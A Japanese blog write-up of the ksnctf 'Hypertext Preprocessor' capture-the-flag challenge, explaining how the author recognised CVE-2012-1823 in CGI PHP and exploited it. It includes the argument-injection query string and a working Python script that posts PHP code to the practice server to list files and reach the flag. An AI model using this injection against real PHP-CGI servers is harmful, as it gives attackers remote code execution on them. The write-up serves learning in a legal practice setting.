ChogeLog

主にセキュリティ関係の記録やWrite-up。たまーに日記も。

#12 Hypertext Preprocessor

ひっさびさの更新!

問題

ksnctf.sweetduet.info

こういう数字だけが表示されています。

解法

とりあえずソースコードを見たけど特になし。
次に問題名の「Hypertext Preprocessor」を調べてみたら、PHPのことをいうらしい('Д')シラナカッタ
それでPHP関係かなと思いつつ、表示されてる数字の「2012:1823」をググったらCVE-2012-1823が引っかかった。
これはCGI版のPHP 5.4.2/5.3.12以前に存在する脆弱性で、URLパラメータにコマンドオプションを含めたらそれを実行しちゃうってヤツ。(この脆弱性を狙ったApache Magica攻撃というのがあるらしい)
実はこの脆弱性は後輩の研究で既に知ってて、早速URLに-sを追加してみたところ、ソースコードを確認できた。

コメントによると、フラグはこのディレクトリ内にあるとのこと。
ちなみに表示されてた数字は、CVE番号、時間、ランダム数値だと分かった。

ここから少し本格的に攻撃する必要があって、徳丸さんのサイトを参考にする。
https://blog.tokumaru.org/2012/05/php-cgi-remote-scripting-cve-2012-1823.html

それによると、この2つのコマンドを使えば任意のPHPコードを実行できるらしい。

  • allow_url_include=On
  • auto_prepend_file=php://input

そして次はPHPコードでフラグを探していく。
Fiddlerでやろうと奮闘したけど、リクエストヘッダの書き方が悪かったらしく?PHPコードが実行されない…。
ということで結局Python書いた(´Д`)

import requests

url = "http://ctfq.sweetduet.info:10080/~q12/"
query = "?-d+allow_url_include%3DOn+-d+auto_prepend_file%3Dphp://input"
payload = '''
 <?php
  foreach(glob('*') as $file){
    if(is_file($file)){
        echo "$file \n";
    }
  }
 ?>
'''
r = requests.post(url+query, data=payload)
html = r.text

print(html)

PHPの処理内容は、ディレクトリ内のファイルを一覧表示するもの。
その結果、flagがあると思われるファイルを発見。

そしてcatで中身を見てフラグゲット!!


元々知ってた脆弱性だったから、そんなに苦戦しなかったかな?
久々に解いて楽しかった(´∀`)